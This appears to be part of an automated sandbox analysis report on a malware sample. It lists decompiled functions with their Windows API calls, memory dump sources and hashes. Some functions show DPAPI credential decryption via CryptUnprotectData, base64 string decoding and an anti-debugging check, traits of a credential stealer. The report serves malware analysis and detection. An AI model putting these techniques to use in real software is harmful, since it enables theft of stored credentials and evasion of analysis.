                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3283940658-0
                                                                                                                                                                        • Opcode ID: 7b7f7e59648351b4cefdfe5b076a920fe889498530794efb4775c72de62d508a
                                                                                                                                                                        • Instruction ID: 3b20fbb6adcc2108ab9cfb5901c719ef884f7b4a73bc41fdc947f69761eaa289
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7f7e59648351b4cefdfe5b076a920fe889498530794efb4775c72de62d508a
                                                                                                                                                                        • Instruction Fuzzy Hash: 60110D33E10209FBDB11EBA4CD8ABAE77BDAF45351F250965E501A2080DB70DB46CF61
                                                                                                                                                                        Function 0018A7AD Relevance: 9.1, APIs: 6, Instructions: 94stringencryptionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 0018A7EA
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A805
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0018A80D
                                                                                                                                                                        • _memmove.LIBCMT ref: 0018A890
                                                                                                                                                                        • lstrcatA.KERNEL32(001B6801,001B6803,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A8BA
                                                                                                                                                                        • lstrcatA.KERNEL32(001B6801,001B680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A8D0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 943939369-0
                                                                                                                                                                        • Opcode ID: 4fca05115cedcf530c48018fe2e60da40799a93a3032913ce20e88f136ae1afb
                                                                                                                                                                        • Instruction ID: c92caefbe6dfcce212fad52f41d18357becca9677b7cd568e15ffee4bf98cc5a
                                                                                                                                                                        • Opcode Fuzzy Hash: 4fca05115cedcf530c48018fe2e60da40799a93a3032913ce20e88f136ae1afb
                                                                                                                                                                        • Instruction Fuzzy Hash: 61315CB1D0011AAFDB11AB54ED849FABBBCAF09341F8400B7F40AE7140E7785A458F62
                                                                                                                                                                        Function 001AB11C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,001AB785,?,001A8536,?,000000BC,?), ref: 001AB15B
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,001AB785,?,001A8536,?,000000BC,?), ref: 001AB184
                                                                                                                                                                        • GetACP.KERNEL32(?,?,001AB785,?,001A8536,?,000000BC,?), ref: 001AB198
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                        • Opcode ID: 56b80d1c9f2e7983199ac2901a72b8fc1a0f547f98c359517dd730c0cd7995f4
                                                                                                                                                                        • Instruction ID: 7a9f409f4a02ad3cb75731caa0d9fbd7057e5accbfbd9b3bfdcec955dd044218
                                                                                                                                                                        • Opcode Fuzzy Hash: 56b80d1c9f2e7983199ac2901a72b8fc1a0f547f98c359517dd730c0cd7995f4
                                                                                                                                                                        • Instruction Fuzzy Hash: 33012035A09686BAEB269B64FCA6F5F73F89F06358F104014F001E50D2E770CEC1D654
                                                                                                                                                                        Function 0019D05A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0019D492
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0019D4A7
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(001B332C), ref: 0019D4B2
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0019D4CE
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0019D4D5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                                                        • Opcode ID: 3542c155f0dd6a4390cb80090e4c90600bae8c8cf72379b1d466810198c66cb2
                                                                                                                                                                        • Instruction ID: 8059b049833714536b75ee0b4f3dbe49693d50e5015898e933310ab2b37f886e
                                                                                                                                                                        • Opcode Fuzzy Hash: 3542c155f0dd6a4390cb80090e4c90600bae8c8cf72379b1d466810198c66cb2
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D21CEB4803206DFDB15EF28FC44A983BA5FB58300F108A1BF51897A60E7B099C6CF95
                                                                                                                                                                        Function 001880A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0018823B), ref: 001880C4
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0018823B,?,?,0018823B,0018CB6A,?,?,?,?,?,?,?,0018CC65,?,?), ref: 001880D8
                                                                                                                                                                        • LocalFree.KERNEL32(0018CB6A,?,?,0018823B,0018CB6A,?,?,?,?,?,?,?,0018CC65,?,?), ref: 001880FD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                        • String ID: DPAPI
                                                                                                                                                                        • API String ID: 2068576380-1690256801
                                                                                                                                                                        • Opcode ID: 5c3543e80952f2db94a20e6f943727b62577da7b3ae3ec231d5dcfff2ecccc59
                                                                                                                                                                        • Instruction ID: 28a35c7c18cb5c11d78e68a067fbe04412f25feacf6d6d6a7d749588346c76a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c3543e80952f2db94a20e6f943727b62577da7b3ae3ec231d5dcfff2ecccc59
                                                                                                                                                                        • Instruction Fuzzy Hash: FB01DA76A01218AFCB01EFA8D98489EBBBDFB48714B108466E906E7340D7719E05CB90
                                                                                                                                                                        Function 0019C00B Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0019C5D4,?,00196F69,?), ref: 0019C05E
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0019C5D4,?,00196F69), ref: 0019C08E
                                                                                                                                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0019C5D4,?,00196F69,?), ref: 0019C0BA
                                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0019C5D4,?,00196F69,?), ref: 0019C0C8
                                                                                                                                                                          • Part of subcall function 0019B9D6: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0019BA0A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3986731826-0
                                                                                                                                                                        • Opcode ID: 890a707f137803c3cd0b93e50280db566a50a74881ec393875b0354d1d637134
                                                                                                                                                                        • Instruction ID: d6b76a18a31a719db2d4aa6699bac852e5a1cefe96a396482db322f3aa09c0c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 890a707f137803c3cd0b93e50280db566a50a74881ec393875b0354d1d637134
                                                                                                                                                                        • Instruction Fuzzy Hash: 82415C71900209DFCF15DF69D884A9EBBF8FF88310F14026AE855EB266E3349945CFA0
                                                                                                                                                                        Function 00191E32 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,003DE708,?,?,?,001928E1,?,?,00000000), ref: 00191E52
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,001928E1,?,?,00000000), ref: 00191E5F
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,001928E1,?,?,00000000), ref: 00191E66
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1871034439-0
                                                                                                                                                                        • Opcode ID: 4f83b951d043773a207f332b5db811271e6b0feafd76cd143c1d733738d75ea4
                                                                                                                                                                        • Instruction ID: 84d55f4e55776a8812b0b896f2b29e02b32ac166798ad6ca65acd002abb35ca5
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f83b951d043773a207f332b5db811271e6b0feafd76cd143c1d733738d75ea4
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A011E71501209FFEF129F61EC488AB7FBEFF497A4B108559F80597110D7319990EB60
                                                                                                                                                                        Function 00188048 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188060
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00186724,?), ref: 0018806E
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188084
